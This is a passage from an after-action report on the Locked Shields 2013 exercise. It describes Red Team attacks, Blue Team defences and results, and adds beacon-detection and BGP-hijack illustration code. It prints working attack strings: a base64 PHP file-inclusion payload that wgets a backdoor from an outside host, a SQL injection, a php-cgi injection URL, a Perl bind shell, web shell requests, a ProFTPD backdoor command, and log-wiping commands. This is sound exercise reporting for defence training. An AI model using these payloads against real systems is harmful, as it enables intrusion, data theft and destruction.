The spreading and infection mechanism was completely missing. Consequently, both backdoors had to be pre-planted into the Windows workstations (ws1.int*, ws3.int*, ws1.wel*, ws2.wel*) before Execution. Other functionality was also limited. It was not possible to get immediate control over the infected host, but the Red Team could use it to upload and run new executables. The first piece was designed to wake at 11:00Z on Day 1 and then, approximately every 15 seconds, contact the command and control (C&C) servers to get new tasks. The C&C servers were addressed by domain names rather than fixed addresses, giving the Red Team the option to change the IP addresses into which those names resolved.
Workstations in all ten Blue Team networks tried to contact the C&C infrastructure with this malware. Note that BT4, BT7 and BT10 had the IP address of their firewall among the contacting addresses, indicating that they used Network Address Translation (NAT). For all the Blue Teams except BT5, BT6 and BT7 this malware was still contacting the C&C servers after the end of the Game. This conclusion is based on the http.log generated with Suricata, which was run over the packet captures of all collected traffic. The last requests from those three teams were:
BT5 at 12:18Z on Day 1

BT6 at 12:40Z on Day 2
BT7 at 13:24Z on Day 2 (the Game was stopped at 13:30Z)
The second piece of malware was designed to wake up at 09:00Z on Day 2. The initial requests came again from all Blue Team networks. There is again one considerable exception: BT5. From their workstations the malware was contacting the C&C servers for only 13 minutes, and after that there are no further requests recorded in our http.log. For reasons unknown to us, the malware also stopped beaconing for some other teams. The last requests towards C&C from these teams were seen as follows:
BT7 at 12:19Z
BT8 and BT10 at 12:32Z
BT9 at 13:21Z
The backdoor planted into the other Blue Teams' networks was calling back from the start until the end of the Game. The interesting aspect of this is that the Green Team had made a major mistake and left the malware installation files, together with a readme, on the workstations in a folder named C:\context folder\installer_d2_quiet. BT5 found this before the Gamenet was opened on Day 1 and informed the other teams about this threat as well but, according to our observations, only 30 minutes before the end of the exercise (at 13:00Z on Day 2 on the ls13blue chat channel):
TO ALL BTs: Make sure you search for the following dlls on your windows workstations:
copy TaurusDll.dll c:\windows
copy TaurusDll.dll c:\windows\system32\winusb32.dll
copy TaurusDll.dll c:\windows\system32\wintrust32.dll
Although this malicious code itself went under the radar of most of the teams, Red Team could not turn it effectively into a real remote access tool. The reason was again AV. The CS team generated an executable with a Meterpreter payload and commanded the malware to download and execute it. It was detected either during the download or during the execution phase. It is still clear that it was too challenging for the Blue Teams to properly identify, block or eradicate that custom threat. If the Red Team had built more logic into the code to allow proper command and control, the attacks would have been much more successful.
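The beaconing described above (one request to the C&C host roughly every 15 seconds, visible in Suricata's http.log) is exactly the kind of pattern a Blue Team could have hunted for in the captured traffic. The following is an added example, not code from the report, from the Red Team or from the Suricata project: it parses the classic Suricata http.log line layout and flags (client, host) pairs whose requests recur at a near-constant interval. All log lines, addresses and host names in it are constructed for the example; the default thresholds (at least four requests, coefficient of variation of the gaps at most 0.15) are assumptions a hunter would tune for their own network.

```python
"""Periodic-beacon detection over Suricata http.log lines.

Added example for this section; it is not code from the LS13 report, from the
Red Team, or from the Suricata project. It parses the classic (pre-EVE)
Suricata http.log line layout and flags (client, host) pairs whose requests
recur at a near-constant interval, the behaviour the pre-planted backdoor
showed (one request to its C&C host roughly every 15 seconds). Every log
line, address and host name below is constructed for the example.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Classic http.log layout:
#   MM/DD/YYYY-HH:MM:SS.ffffff host [**] uri [**] user-agent [**] src:port -> dst:port
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{6}) (?P<host>\S+) \[\*\*\] "
    r"(?P<uri>\S+) \[\*\*\] (?P<ua>.*?) \[\*\*\] "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):\d+ -> (?P<dst>\d{1,3}(?:\.\d{1,3}){3}):\d+$"
)


def parse_line(line):
    """Return (timestamp, src_ip, host, uri) for one http.log line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f")
    return ts, m["src"], m["host"], m["uri"]


def find_beacons(lines, min_hits=4, max_cv=0.15):
    """Group requests by (client IP, HTTP host) and report the pairs whose
    inter-request gaps are near-constant.

    A pair is reported when it has at least min_hits requests and the
    coefficient of variation of the gaps (population stdev / mean) is at
    most max_cv. Returns {(src, host): (hits, median_gap_seconds)}.
    """
    stamps_by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not an http.log record (blank or foreign line)
        ts, src, host, _uri = rec
        stamps_by_pair[(src, host)].append(ts)

    beacons = {}
    for pair, stamps in stamps_by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue  # all requests in the same instant; not a timer
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            beacons[pair] = (len(stamps), statistics.median(gaps))
    return beacons


# Constructed sample: one workstation polling a C&C host every ~15 s, one
# workstation browsing an intranet site irregularly, one with a single hit.
UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
SAMPLE_LOG = [
    f"04/24/2013-11:00:00.000000 c2-update.example.net [**] /task.php?id=7 [**] {UA} [**] 10.1.3.21:49152 -> 10.0.9.8:80",
    f"04/24/2013-11:00:01.000000 intranet.example.org [**] / [**] {UA} [**] 10.1.3.22:49201 -> 10.1.2.10:80",
    f"04/24/2013-11:00:03.000000 intranet.example.org [**] /news [**] {UA} [**] 10.1.3.22:49202 -> 10.1.2.10:80",
    f"04/24/2013-11:00:15.000000 c2-update.example.net [**] /task.php?id=7 [**] {UA} [**] 10.1.3.21:49153 -> 10.0.9.8:80",
    f"04/24/2013-11:00:30.200000 c2-update.example.net [**] /task.php?id=7 [**] {UA} [**] 10.1.3.21:49154 -> 10.0.9.8:80",
    f"04/24/2013-11:00:41.000000 intranet.example.org [**] /news/3 [**] {UA} [**] 10.1.3.22:49203 -> 10.1.2.10:80",
    f"04/24/2013-11:00:42.000000 intranet.example.org [**] /news/4 [**] {UA} [**] 10.1.3.22:49204 -> 10.1.2.10:80",
    f"04/24/2013-11:00:45.100000 c2-update.example.net [**] /task.php?id=7 [**] {UA} [**] 10.1.3.21:49155 -> 10.0.9.8:80",
    f"04/24/2013-11:01:00.200000 c2-update.example.net [**] /task.php?id=7 [**] {UA} [**] 10.1.3.21:49156 -> 10.0.9.8:80",
    f"04/24/2013-11:01:02.000000 c2-update.example.net [**] /task.php?id=9 [**] {UA} [**] 10.1.3.23:49300 -> 10.0.9.8:80",
    "this line is not an http.log record and is skipped",
]

if __name__ == "__main__":
    for (src, host), (hits, gap) in sorted(find_beacons(SAMPLE_LOG).items()):
        print(f"{src} -> {host}: {hits} requests, median gap {gap:.1f} s")
```

The irregular intranet browsing has as many hits as the beacon but a gap spread far above the threshold, so only the C&C pair is reported; a real run would feed the whole http.log in and then look at the reported hosts, since a legitimate software updater polls on a timer too.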

4.5 WEB Team

Phase I

Objectives
The WEB team started the exercise by targeting web applications and database servers in the Aid_DMZ segment. Their objectives for the first phase were:
O1: Deface a web site (counting.aidx.ex)
O3: Change the bank account number for donations (public web portal)
O4: Steal the volunteer database (db.aidx.ex)

Targets
The security posture of the systems running web applications is best compared with the good old Swiss cheese: it was full of holes. Below we describe the functionality and main vulnerabilities of the phase I targets:
counting.aidx.ex was a DokuWiki based web site used by Aid organisation workers for counting dead bodies. It was possible to read the source code, trigger DoS or even execute arbitrary code by exploiting a known vulnerability in the installed PHP version. An ICMP based root shell backdoor as well as a PHP shell (/bodycount/lib/images/media.php.png) were pre-planted.
The public web portal was a custom PHP-based web site for sharing information with the general public, coordinating donations, collecting applications from volunteers, etc. The second function of the host was an FTP server to enable the Aid workers to share large files. Basically, it was built breaking all the rules of secure programming:
ProFTPD 1.3.3e was built with the same backdoor that was discovered in 1.3.3c. Sending the server the command HELP BLUETEAMSSUCK gave a root shell.
The server ran a custom compiled older version of PHP (5.3.1).
Input and output were not validated, leading to SQLi, XSS, CSRF, etc. vulnerabilities.
The page navigation system and the PHP configuration allowed remote file inclusion.
File uploads were not protected.
A PHP backdoor named Hookworm was left behind.
db.aidx.ex served as the MySQL database server for the web applications and as an NFS file server. NFS was really badly configured: the shares were open to the world, and root_squash was turned off. It would have been possible to get a shell on that host by, for example, writing an SSH key under the user account of admin using the open NFS shares. The password for the MySQL root user was obviously root.
An older version of phpMyAdmin with a known remote code execution vulnerability was deployed on the system.

Attack Methods
The vulnerabilities of the targets pretty much defined what kinds of techniques were possible. Not all the vulnerabilities were exploited. Red Team members had access to the documentation of the systems, but it was not possible to assimilate all that information without spending time on preparation. Attacking issues such as XSS and CSRF was not practised as it would have required actions from the application users. Examples of web attacks:

1. Some backdoors were found during the preparation days, and some were more effective than others. For instance, the backdoor in ProFTPD running on the web portal host was successfully used against 6 teams for the second phase defacements. Then it was discovered and the binary was replaced.
2. PHP protocol wrappers became useful when exploiting file inclusion vulnerabilities. Consider the following request sent to the portal:
/index.php?cmd=ls%20-la&page=data:text/plain;base64,PD9waHAgc3lzdGVtKCdtdiAvdmFyL3d3dy9hcHAvdGVtcGxhdGVzL2RvbmF0ZS50cGwgL3RtcC9hc2QudHBsOyB3Z2V0IC1xIDEwLjAuMTkxLjgwL2JhY2tkb29ycy9kb25hdGUudHh0IC1PIC92YXIvd3d3L2FwcC90ZW1wbGF0ZXMvZG9uYXRlLnRwbDsgcm0gL3Zhci93d3cvYXBwL3RlbXBsYXRlc19jLypkb25hdGUudHBsLnBocDsnKTsgPz4%3D
When the Base64 encoded string is decoded we get:
<?php system('mv /var/www/app/templates/donate.tpl /tmp/asd.tpl; wget -q 10.0.191.80/backdoors/donate.txt -O /var/www/app/templates/donate.tpl; rm /var/www/app/templates_c/*donate.tpl.php;'); ?>
The data: wrapper lets the attacker supply the "included" file in the URL itself, so no upload is needed: the included PHP replaces the donations template (and removes the compiled template cache so the new one takes effect).
3. SQL injection was a common vector to steal data. Example of a GET request sent to the portal:
/index.php?page=water_sanitisation&resource_id=0 union select 1,2,3,4,(select group_concat(concat(id,char(124),firstname,char(124),lastname,char(124),char(124),gender,char(124),char(124), ,char(124),blood_type,char(124),code) separator 0x3b0a) from #
4. POST request sent to counting.aidx.ex in an attempt to use the Metasploit module named php_cgi_arg_injection:
/?--define+allow_url_include%3don+-%64+safe_mode%3d0+-%64+suhosin.simulation%3dON+-%64+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+-n
The Base64 decoded payload that was in the POST request body:
perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,4445,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'
5. DokuWiki usernames and hashed passwords could be obtained from the file users.auth.php.
The vulnerability in the PHP installed on counting.aidx.ex allowed attackers to read the source of the files and therefore to obtain the credentials:
[24/Apr/2013:10:40: ] GET /bodycount/conf/users.auth.php?-sdlogin&aid-admin HTTP/ Host: counting.aid4.ex
6. Unprotected file uploads provided an easy way to upload a web shell and execute arbitrary code. See for instance the TV tower attack:
POST /uploads/wso.php_1.php HTTP/1.1
Host: tv.mil4.ex
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/ Firefox/18.0 Iceweasel/

...
a=console&c=/var/www/uploads/&p1=wget /files/1.mp4&p2=&p3=&charset=UTF

Results
The results of the attacks were as follows:
Defacement of counting.aidx.ex: the first round was successful against 7 teams. According to the Red Team reports only BT2 actually fixed the vulnerability:
BT2: vulnerabilities fixed! good job!
BT4: host connection timed out
BT5: functionality does not work
Changing the bank account number for donations: the first round was successful against 6 teams. Based on the Red Team reports, only BT8 and BT9 mitigated the attack. BT5 had availability issues due to a Green Team fault at the beginning of phase I:
BT5: Most of time not available
BT6: Functionality skipped, often not available
BT8: Failure
BT9: Changed access to files that the attack tried to change
An additional issue was that some features were added after the Blue Team preparation days. The rules did not state that these kinds of changes were not allowed or would not be done. Still, the changes should have been communicated to the Blue Teams. Some teams had downloaded the source code during the preparation days, secured it, and as soon as the exercise started uploaded their own version of the application. That version was missing the modifications made by the Green Team after the prep-days. This created an unfair situation, as the other Blue Teams had to protect systems with more functionality and more vulnerabilities. Consequently, the White Team ordered those teams to restore the functionality and finally had to revert some of the VMs.
Stealing the volunteer database from db.aidx.ex: the first round was successful against 7 teams. This objective was never achieved against BT2 and BT4. We do not have the data to draw final conclusions, but a look at the availability score suggests that the Red Team members probably could not access the vulnerable service for these teams. During the first round there was also no access to the BT6 database server.
BT2: no access (availability of the HTTP service on db.aid2.ex 0%, MySQL 94%)
BT4: no access (availability of the HTTP service on db.aid4.ex 14%, MySQL 27%)
BT6: no access (HTTP 61%, MySQL 35%)
Note that stealing the volunteer database could also have been achieved through the web application running on the public web portal.

Phase II

Objectives
O8: Insert malicious code into the MIL public website in order to initiate a watering hole attack and infect MIL_INT and MIL_WEL workstations.

Targets
The second phase of the Red Team campaign defined one new target for the WEB team: the MIL public website. This was a WordPress website covering the activities of the military units deployed in Boolea. The system initially had the following main security issues:
The operating system was based on an un-patched Linux kernel version which allowed privilege escalation.
The web application was based on the WordPress CMS with several out-dated plug-ins:
Advanced Custom Fields (remote file inclusion).
Website FAQ version 1.0 (SQL injection).
Custom Content Type Manager (file upload).
A backdoor allowing PHP code execution in a rogue file called wp-save.php.
A backdoor created with the Cymothoa tool, which periodically tried to connect to port 80 on specific IPs and spawn a shell.
Note that the Blue Teams were not allowed to patch this system but had to rely on other security measures.

Results
The first round of the attack was successful against 6 teams; BT4, BT5, BT6 and BT8 prevented it. The second round was successful against only 3 teams: BT3, BT7 and BT10.
The WEB team also continued to pressure the Blue Teams in Aid_DMZ by repeating some of the phase I objectives:
Defacement in Aid_DMZ was accomplished against every Blue Team: counting.aidx.ex was defaced for 4 teams and the public web portal for 6 teams.
The volunteer database on db.aidx.ex was (re-)stolen from 6 teams: BT1, BT5, BT7, BT8, BT9 and BT10. The only significant difference is that this time the attack against BT3 failed.

Phase III

Objectives
O13: Insert fake orders into the Aid personnel tasking system, leading them into an ambush (help.aidx.ex).
O14: Gain and maintain access to the DNS servers (dns.aidx.ex).

Targets
The new target for the 3rd phase was help.aidx.ex. The application was implemented in Java and, as usual, contained a lot of vulnerabilities:
SQLi in almost every possible place.
Vertical access control vulnerabilities (direct links to /list_users, /list_tickets, /list_request and /ticket worked without logging in).

Stored XSS (the payload could be inserted into the help requests).
MS SQL running with easy to guess credentials.

Results
The help request system was compromised for BT1, BT2, BT3, BT7 and BT10. The Red Team reported the following reasons why they failed against the other teams:
BT4: vulnerability not fixed but application does not work!
BT5: vulnerability not fixed but application does not work but gives user wrong information and making impression like it works
BT6: vulnerability fixed
BT8: vulnerability fixed
BT9: Web server is down! (Overall availability 11%)

Phase IV

Objectives
There were no new objectives for the WEB team in the last phase. The goal was just to repeat the previous objectives.

Results
The volunteer database on db.aidx.ex of 6 teams (BT1, BT3, BT5, BT6, BT7, BT10) was still accessible. This time the Red Team deleted the database and changed the passwords where possible. Interestingly, during the final phase many of these attacks were conducted just by accessing the MySQL database with username root and password root. counting.aidx.ex also remained too challenging to secure. The web pages of 6 teams (BT2, BT3, BT6, BT7, BT9, BT10) were defaced again.

4.6 Network and Mixed Team
In this section we describe the offensive activities mainly related to network services and network protocols. In general, LS13 had a low emphasis on network layer attacks. This was not intentional, but there were just no Red Team members with good network pen-testing skills committed during the planning process. During Execution there were also only a few people in the NET team, and some of the objectives cov
ered in the following areas were actually assigned to WEB team members.

Phase I

Objectives
An additional goal for the WEB team was O2: Destroy the chat server (chat.aidx.ex).

Targets
An IRC-based chat server (chat.aidx.ex) was a less important target in Aid_DMZ as no real communication was simulated on it. It was running a trojaned UnrealIRCd daemon (the CVE-listed backdoored release) and this was the only vulnerability known to us.

Results
The attack succeeded against only one team. The others had either secured the service or it was not available during the attack timeframe:
Compromised: BT2
Service unavailable/filtered: BT4, BT6, BT7, BT10
Patched: BT1, BT3, BT5, BT8, BT9

Phase II

Objectives
The second phase objective was to hack into the mail servers:
O9: Compromise the mail server in MIL_DMZ and steal specific e-mails (mail.milx.ex)
O10: Compromise the mail server in Aid_DMZ and steal specific e-mails (mail.aidx.ex)

Targets
The mail servers on both the MIL and the Aid side were based on the same image. It was a Linux system running the Postfix SMTP daemon. Mailboxes had to be accessible over POP3S, IMAPS, HTTP and HTTPS. The vulnerabilities were:
Remote arbitrary command injection in the SpamAssassin Milter plug-in (CVE-listed).
A pre-planted backdoor spawning a shell on receiving specific HTTP requests.
A malicious SUID binary providing a root shell.

Results
Using the exploit against the Milter plug-in worked both in MIL_DMZ and Aid_DMZ for 4 teams: BT2, BT3, BT4, BT9. Most of the Blue Teams either had the service patched, a workaround in place (removing OPTIONS="-x" from /etc/default/spamass-milter, which disables the vulnerable expansion mode), or other countermeasures applied. We do not know the status of BT6 as their SMTP service seemed to be filtered: the overall availability of SMTP on mail.aid6.ex was 73%, and on mail.mil6.ex 0%.

Phase III

Objectives
On the morning of Day 2 the DNS servers came under attack. The goal was simply to gain access:
O14: Gain and maintain access to the DNS servers (dns.aidx.ex, dns.milx.ex)
More interesting scenarios, such as poisoning the DNS server of the ISP with long-lived records to cause denial or hijacking of services, were not played out. In addition, repeated attacks against the mail servers were planned.

Targets
Both dns.milx.ex and dns.aidx.ex were running on Ubuntu Linux and BIND 9. The only known vulnerability was inside the bind9 binary itself: it was trojaned. After receiving a particular DNS request, the modified server connected to port 80 of the requester and spawned a shell.

Results
The DNS server was compromised only for BT9. This is quite natural, as the Blue Teams had a lot of time to discover and replace the trojaned binary. BT1 sent a chat message on ls13blue already at 08:32Z on Day 1 that they had "Found backdoor /usr/sbin/named". BT9 had serious connectivity issues during the whole of Day 1 and probably missed it. The mail servers of BT2, BT3 and BT9 were compromised again and defaced.

Phase IV

Objectives
The following objective was left as the last action:
O20: Conduct a routing attack against MIL_DMZ (csr.milx.ex).
A BGP route hijacking attack was planned for the final hour of the exercise because we did not want to cause wide-scale connectivity issues in the Gamenet before the very end of the exercise, for two reasons. Firstly, during the Execution there was only one person in the Green Team who knew the routing infrastructure. Secondly, we wanted to avoid the Red Team losing their established sessions in Blue Team systems.

Targets
Each Blue Team had one Cisco CSR 1000V virtual router connecting their MIL segment with the Simulated Internet. Each router was connected to 2 ISP routers, which were administered by the Green Team, and to the routers of 2 other Blue Teams. BGP was used as the main routing protocol. The routers themselves didn't have any known vulnerabilities except weak initial passwords.

Results
Red Team had control over one CSR (that of the nonexistent BT11) which was connected to the ISP routers (AS number 65011). About 50 minutes before ENDEX Red Team started to announce prefixes that belonged to the Blue Teams. For instance, four static routes of the following form, one per hijacked BT1 subnet, were inserted on that router so that the prefixes would be originated into BGP:
ip route <BT1 prefix> <mask> Null0
The Green Team did not care who was advertising what kind of routes. No filters were applied to the Game ISP routers.
Therefore the Blue Teams could not do much by themselves. Many teams started to filter out AS65011, thereby fixing the routing tables on their own routers, but the ISP routers remained poisoned. Basically, the options the Blue Teams had were as follows:

Monitor and understand why their traffic was suddenly gone.
Start advertising more specific routes: for instance /27 prefixes, as the Red Team was poisoning with a /26. This works because the longest matching prefix wins on every router along the path, including the unfiltered ISP routers, provided they accept and propagate the more specific announcements.
Although we believe this knowledge is trivial for people with experience in wide area networks, we observed only BT8 immediately applying that tactic.

4.7 Post-Exploitation
Making attacks persistent is the natural move of the bad guys after gaining initial access. As the exercise was short, the Red Team did not always try to stay hidden but sometimes just messed around inside the targets. Next we describe some of the post-exploitation operations:
1. CS team. Generally, after the initial compromise of a workstation: determine the privileges obtained, escalate if possible and necessary, always install beacons if possible, then dump hashes, enumerate installed application versions, and use the system to pivot and spread further if viable. Whenever an objective was completed to the required level, evidence was collected in the form of data, or at least screenshots, for reporting purposes before marking an attack a success.
2. WEB team.
Writing web-based backdoors into other files.
Creating new administrative sessions by assigning their own value to the sess_sessionid variable in the respective file.
Reading out MySQL database credentials to connect directly or via phpMyAdmin.
3. Miscellaneous.
Inserting their own SSH keys for existing user accounts.
Deleting logs and messing with the commonly used binaries:
mv /bin/ls /bin/sll
mv /bin/cat /bin/dog
rm /var/log/*log
rm /etc/apt/sources.list

4.8 Balance of the Attacks
Based on the human reports, we can infer that RT managed to keep their campaign balanced against each Blue Team. Of course this does not provide an indication of how much effort was put in to achieve specific objectives against specific teams.
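The two outcomes described for the routing attack in 4.6 (filtering AS65011 on a Blue Team's own CSR fixed that router only, while the ISP routers stayed poisoned, and announcing /27s inside the hijacked /26 fixed the ISP routers as well) follow from BGP's longest-prefix rule. The following is an added example that models just enough of best-path selection to show both effects; it is not code from the report or from any router vendor. The 10.1.0.0/24 victim prefix, the victim AS number 65001 and the address 10.1.0.70 are constructed for the example; only AS65011 (the Red Team's CSR) comes from the report, and the tie-break among equal-length prefixes is simplified to "shortest AS path".

```python
"""Longest-prefix-match view of the LS13 BGP hijack and the /27 counter-move.

Added example, not code from the report or from any router vendor. It models
the routers' best-path choice only as far as needed to show why filtering
AS65011 on a Blue Team's own CSR did not help while the ISP routers kept the
hijacked route, and why announcing more specific prefixes did. The prefixes
and the victim AS number (65001) are constructed; only AS65011 (the Red Team
CSR) comes from the report.
"""
import ipaddress


class Rib:
    """Minimal routing information base: prefix -> list of AS paths learned."""

    def __init__(self):
        self.routes = {}  # ip_network -> [tuple(as_path), ...]

    def announce(self, prefix, as_path):
        net = ipaddress.ip_network(prefix)
        self.routes.setdefault(net, []).append(tuple(as_path))

    def withdraw_from(self, origin_as):
        """Drop every path originated by origin_as. This is what filtering
        AS65011 on a Blue Team's own router achieved, for that router only."""
        for net in list(self.routes):
            self.routes[net] = [p for p in self.routes[net] if p[-1] != origin_as]
            if not self.routes[net]:
                del self.routes[net]

    def best(self, ip):
        """Origin AS that traffic for ip is forwarded towards, or None.

        Longest matching prefix wins; among equal lengths the shortest AS path
        wins. Local preference, MED and the remaining tie-breaks are left out."""
        addr = ipaddress.ip_address(ip)
        candidates = [
            (net.prefixlen, -len(path), path)
            for net, paths in self.routes.items()
            if addr in net
            for path in paths
        ]
        if not candidates:
            return None
        return max(candidates)[2][-1]


def more_specifics(prefix, new_prefixlen):
    """Split prefix into the more specific announcements that override a
    covering hijack (e.g. the /26 into its two /27s)."""
    net = ipaddress.ip_network(prefix)
    return [str(n) for n in net.subnets(new_prefix=new_prefixlen)]


def hijack_walkthrough(victim_as=65001, attacker_as=65011, target="10.1.0.70"):
    """Origin AS chosen for one victim address at each stage of the attack,
    as seen by an unfiltered ISP router and by the victim's own CSR."""
    isp, csr = Rib(), Rib()
    for rib in (isp, csr):
        rib.announce("10.1.0.0/24", (victim_as,))      # the Blue Team's MIL prefix
    stage = {"before": isp.best(target)}
    for rib in (isp, csr):
        rib.announce("10.1.0.64/26", (attacker_as,))   # hijack: a covering, longer prefix
    stage["hijacked"] = isp.best(target)
    csr.withdraw_from(attacker_as)                     # Blue Team filters AS65011 locally
    stage["csr_after_filter"] = csr.best(target)
    stage["isp_after_filter"] = isp.best(target)       # ISP router is still poisoned
    for p in more_specifics("10.1.0.64/26", 27):       # Blue Team announces /27s
        isp.announce(p, (victim_as,))
    stage["isp_after_more_specifics"] = isp.best(target)
    return stage


if __name__ == "__main__":
    for name, origin in hijack_walkthrough().items():
        print(f"{name:>26}: traffic for 10.1.0.70 goes to AS{origin}")
```

The walkthrough also shows the limit of the tactic: the more specific announcements only help for the part of the address space they cover, and a /24 can be split into /25s or /26s only as far as the upstream ISP accepts long prefixes.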

4.9 Conclusions
1. Compared to last year's exercise, the CS team was less successful. There are many reasons for that:
Blue Teams took the exercise much more seriously and put considerable effort into preparation. The main vulnerabilities were quickly fixed and the systems protected with a wide range of security tools.
Monitoring capabilities have significantly improved.
The infrastructure was stable. In 2012, most Blue Teams did not prepare their own VMs or could not get them running due to complexity and bugs in the virtualisation platform's management software. In LS13, 9 out of 10 teams prepared separate VMs with their own tools and integrated them into the environment.
Red Team mainly used the default executable templates and payloads generated with the free version of Metasploit. AV and IPS systems have no problem detecting and blocking this kind of malicious file.
2. As expected, custom backdoors are difficult to find in already infected systems. The custom code that was pre-planted in some of the Windows systems was still calling the C&C servers after the end of the Game from 7 teams.
3. The WEB team did see some progress from the Blue side in defending the web applications. This time, almost all Blue Teams used Web Application Firewalls (WAF). Still, the attacks were very successful and the common vulnerabilities were often not fixed. WAFs quite often broke the functionality of the applications. Some teams also used other proscribed tactics, such as replacing dynamic web pages with static ones. One team blocked access to the web site after the first request, no matter whether it was a legitimate request or not.
4. The NET team had only one specific objective. The number of attacks against network protocols and infrastructure must be increased to make the event more interesting. BGP route hijacking was quickly discovered by many teams but mitigated by only one. Further investigation would reveal the reason for that outcome.
5. The model of establishing the Red Team from ad-hoc volunteers who cannot be expected to prepare and practise beforehand is no longer sufficient to challenge the Blue Teams. We need a more permanent and better trained team. The members have to know each other's skills. Engaging members with advanced capabilities, such as being able to evade AV and IPS, is a must.

5 Blue Team Defence Campaign

5.1 Introduction
Blue Teams used standard security practices and some custom solutions which were beneficial in the context of the exercise. We considered the following factors to be the key to success:
Preparation. The amount of time the Blue Teams spent on preparation has significantly increased compared to previous exercises.
Having the expertise to secure all components of the infrastructure. Teams with only Windows or only Linux experts could not protect the whole network. There were many web applications, and having developers in the team who could fix the code, not just carry out virtual patching with web application firewalls, was beneficial. Too often the WAFs broke functionality.
Monitoring. Naturally, being able to detect malicious activities in your network is one of the most important capabilities.
Teamwork, communication and division of roles. The organisers tried to create a high-stress situation by flooding the teams with tasks.

5.2 Preparations
The first information about the environment was provided to the Blue Teams 6 weeks before Execution. In the beginning, the descriptions of the Test Run systems and the rules were available. A more stable version of the documentation was finalised 2 weeks before the main run, but we still had to make changes to answer questions and problems raised by the Blue Teams. On 16 and 17 April the Blue Teams had initial access to the environment. Based on feedback, many Blue Teams invested a lot of time in preparation, between 3 days and 2 weeks. The main activities were the following:
Reading the documentation and analysing the scenario. The information available from past exercises was also considered useful, particularly the after action report of Locked Shields 12 and a presentation given by a member of the Baltic Cyber Shield 2010 winning team.
Deciding on strategy and creating an action plan for execution. Assigning roles.
Scanning the systems and identifying and documenting vulnerabilities during the initial access days.
Writing firewall rules and hardening scripts.
The most successful team met weekly to go through various attack scenarios. They built their own VM images and tested them in their own lab with continuous fine tuning. They also created Windows XP and 7 images, taking into account the descriptions available in the exercise wiki, in order to exploit them and to test their security measures. We received mixed feedback on whether there was enough time (2+1 days) to access the systems before the game started. BT8 felt that there should be less time so as to make the event more challenging. BT1 responded that much more time would be needed. The overall responses are summarised below:
More time required: 4 teams (5 responders)
Current setting is OK: 5 teams (6 responders)
Less time should be given: 1 team (4 responders)

5.3 Common Practices
All Blue Teams used well-known practices to secure their systems. We have outlined below the defence methods that were used by several teams. The list is based on feedback and on our own observations. The tools mentioned are for illustration; neither the list of methods nor the tools are exhaustive:
Scanning and testing own networks: Nessus, Acunetix, Armitage.
Patching. Note that one of the winning team's strategies was "Don't patch unless you really need to".
Anti-Virus. The list of products used by the different teams is provided in section 5.7. Scanning was done through shares (C$) to allow users to continue working. Suspicious files were submitted to malware analysis services such as VirusTotal.com and ThreatExpert.com.
Network Intrusion Detection and Prevention Systems (IDS/IPS): Snort (e.g. as already present on Endian Firewall and Security Onion).
Host-based IDS: OSSEC.
Personal and perimeter firewalls.
System hardening:
Applying restrictive GPOs for white listing, password policy, firewall, etc.
Restricting user rights. Disabling unnecessary accounts and services.
TTL security for BGP.
PHP configuration: magic_quotes_gpc = On (was Off), magic_quotes_runtime = On (was Off), allow_url_include = Off (was On), max_file_uploads = 1 (was 20).
CSR router configuration: ACLs including AS path ACLs, route-maps, login block.
Restricting the applications that could be run on the systems: AppLocker.
Web Application Firewalls: mod_security, e.g. using the OWASP core rule set.
Central logging and SIEM systems: Splunk.
Reinstalling important binaries such as bind9, vsftpd, proftpd.
Central monitoring of file changes: auditd in Linux.

5.4 Blocking Access and RBL
A very common activity was to block any IP address which seemed to be a source of suspicious actions. Detecting malicious traffic was relatively easy, as the simulation system generally failed to create the expected amount of legitimate traffic. BT4 prepared a Real-Time Blackhole List (RBL) service for sharing attackers' IP addresses. Each Blue Team could submit the malicious IPs detected by them to the service and download the full list in different formats. Each IP had a reputation score based on how many times it had been submitted. This service reflected the real-world situation where trusting such third-party blacklists becomes an issue. A few teams shot themselves in the foot, as the IP addresses of the scoring bots were entered on the list and this caused a lot of failed availability checks. On the other hand, this incident made the Green Team notice that the scoring bot was using the same IP all the time instead of changing it for every round.

5.5 Less Common Practices
Some defence methods were more unusual. At least, we observed only a few teams using the following:
Preparing their own VM to be placed between the existing pre-built systems. The most successful team placed their IPS inline (a Palo Alto virtualised firewall running PanOS Release 2) in front of the existing external perimeter firewall on both the Aid and the MIL side. BT1 placed their VM between the existing Endian firewall and the Aid_DMZ systems to proxy all web requests through it.
Remark. The initial rules did not clearly regulate whether this kind of integration would be supported by the Green Team. We answered no to BT2, who requested it first. This required the Green Team to create additional VLANs and remap network interfaces after the reversions, so we considered it risky. Later the rule was changed but not communicated back to BT2.

Developing a patch for the custom web application (the public web portal) to sanitise input and remove backdoors (BT8). The following sanitise() function was defined:
function sanitise($str = "", $pattern = "a-zA-Z0-9\ õüäöÕÜÄÖ\-\_\(\)šŠ,žŽ") {
    // allow-list filter: every character outside $pattern is deleted
    return trim(preg_replace('/[^' . $pattern . ']/', '', $str));
}
It was then applied to the various GET and POST input parameters:
$searchstr = sanitise($_POST['search']);
Another method was to apply correct type casting:
$topic_id = intval($topic_id);
This kind of fix worked well in the context of the exercise. Its applicability in a real-life situation is more questionable: e.g. the sanitise function deletes single quotes from the input, but what about poor Mr O'Neal?
Using a workaround to get rid of the backdoor in vsftpd on tv.milx.ex (BT1). BT1 discovered that the vsftpd binary had a backdoor that executes a classical bind shell (bind, listen, accept, dup2 of the standard streams, execl). So they came up with a containment patch which disabled the vulnerability by overwriting the execl call in the binary with no-operation instructions (0x90):
